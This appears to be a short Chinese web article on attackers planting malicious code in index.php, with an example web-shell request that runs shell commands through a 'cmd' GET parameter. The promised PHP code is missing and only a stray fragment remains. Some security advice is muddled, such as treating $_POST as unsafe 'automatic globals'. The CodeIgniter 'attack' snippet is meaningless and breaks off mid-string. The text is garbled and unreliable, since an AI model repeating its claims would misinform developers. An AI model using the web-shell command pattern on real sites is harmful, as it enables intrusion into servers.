index.php黑料

index.php是許多網站使用的主文件。黑客可以利用網站未正確防范的點或漏洞來攻擊index.php文件，那么接下來我們來討論一下index.php黑料問題。

黑客可以將惡意代碼插入index.php文件中，這樣一旦有人訪問該網站，就會觸發該代碼。這樣的攻擊常常被稱為“virus.php”攻擊。例如下面的PHP代碼：

’ ?>

一旦黑客將該代碼插入index.php文件中，任何人都可以通過GET請求發送shell命令，例如：

http://website.com/index.php?cmd=ls –la

這也是為什么許多安全專家推薦，不使用PHP的自動全局變量功能($_POST，$_REQUEST等)。

如果網站使用了CodeIgniter框架，那么許多細節問題也可以導致安全隱患。例如，CodeIgniter 3.0版本之前允許在$config數組中修改cookie_name值。

$config ['cookie_name'] = 'ci_session';

因此，黑客可以使用類似于以下代碼的代碼來攻擊CodeIgniter網站：

$config ['sess_cookie_name'] = 'malicious name';
$malicious_script = "